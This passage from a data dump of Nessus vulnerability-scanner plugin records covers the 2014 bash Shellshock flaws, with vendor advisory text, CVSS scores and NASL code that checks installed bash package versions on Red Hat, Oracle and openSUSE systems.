(rpm_check(release:\"RHEL5\", cpu:\"i386\", 
reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested 
= pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:38", "description": "From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. 
For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77951", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# Oracle Linux Security Advisory ELSA-2014-1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77951);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. 
For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004484.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004485.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004486.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:38:03", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix signal handling in read builtin Resolves: #1421926\n\n - CVE-2016-9401 - Fix crash when '-' is passed as second sign to popd Resolves: #1396383\n\n - CVE-2016-7543 - Fix for arbitrary code execution via SHELLOPTS+PS4 variables Resolves: #1379630\n\n - CVE-2016-0634 - Fix for arbitrary code execution via malicious hostname Resolves: #1377613\n\n - Avoid crash in parameter expansion while expanding long strings Resolves: #1359142\n\n - Stop reading input when SIGHUP is received Resolves:\n #1325753\n\n - Bash leaks memory while doing pattern removal in parameter expansion Resolves: #1283829\n\n - Fix 
a race condition in saving bash history on shutdown Resolves: #1325753\n\n - Bash shouldn't ignore bash --debugger without a dbger installed Related: #1260568\n\n - Wrong parsing inside for loop and brackets Resolves:\n #1207803\n\n - IFS incorrectly splitting herestrings Resolves: #1250070\n\n - Case in a for loop in a subshell causes a syntax error Resolves: #1240994\n\n - Bash shouldn't ignore bash --debugger without a dbger installed Resolves: #1260568\n\n - Bash leaks memory when repeatedly doing a pattern-subst Resolves: #1207042\n\n - Bash hangs when a signal is received Resolves: #868846", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-30T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bash (OVMSA-2017-0050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0050.NASL", "href": "https://www.tenable.com/plugins/nessus/99077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0050.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99077);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-7169\",\n \"CVE-2016-0634\",\n \"CVE-2016-7543\",\n \"CVE-2016-9401\"\n );\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bash (OVMSA-2017-0050)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix signal handling in read builtin Resolves: #1421926\n\n - CVE-2016-9401 - Fix crash when '-' is passed as second\n sign to popd Resolves: #1396383\n\n - CVE-2016-7543 - Fix for arbitrary code execution via\n SHELLOPTS+PS4 variables Resolves: #1379630\n\n - CVE-2016-0634 - Fix for arbitrary code execution via\n malicious hostname Resolves: #1377613\n\n - Avoid crash in parameter expansion while expanding long\n strings Resolves: #1359142\n\n - Stop reading input when SIGHUP is received Resolves:\n #1325753\n\n - Bash leaks memory while doing pattern removal in\n parameter expansion Resolves: #1283829\n\n - Fix a race condition in saving bash history on shutdown\n Resolves: #1325753\n\n - Bash shouldn't ignore bash --debugger without a dbger\n installed Related: #1260568\n\n - Wrong parsing inside for loop and brackets Resolves:\n #1207803\n\n - IFS incorrectly splitting herestrings Resolves: #1250070\n\n - Case in a for loop in a subshell causes a syntax error\n Resolves: #1240994\n\n - Bash shouldn't ignore bash --debugger without a dbger\n installed Resolves: #1260568\n\n - Bash leaks memory when repeatedly doing a pattern-subst\n Resolves: #1207042\n\n - Bash hangs when a signal is received Resolves: #868846\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-March/000659.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49d2a21e\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-March/000669.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?85c795b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bash-4.1.2-48.el6\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bash-4.1.2-48.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:20", "description": "This patch was withdrawn by the openSUSE team, as the software was fixed prior to release. 
No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over BASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents and for loop issue", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2014-567.NASL", "href": "https://www.tenable.com/plugins/nessus/78115", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-567.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\n# @DEPRECATED@\n#\n# This script has been deprecated as it has been determined that the\n# advisory was withdrawn and fixed prior to release of openSUSE 13.2.\n#\n# Disabled on 2015/11/02.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(78115);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)\");\n script_summary(english:\"Check for the openSUSE-2014-567 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This patch was withdrawn by the openSUSE team, as the software was\nfixed prior to release. No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over\nBASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE\ndocuments and for loop issue\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-09/msg00063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=895475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The advisory was withdrawn by the vendor as the patch is not needed.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debugsource-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-devel-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-lang-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-debuginfo-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"readline-devel-6.2-75.4.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-75.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:49", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_. 
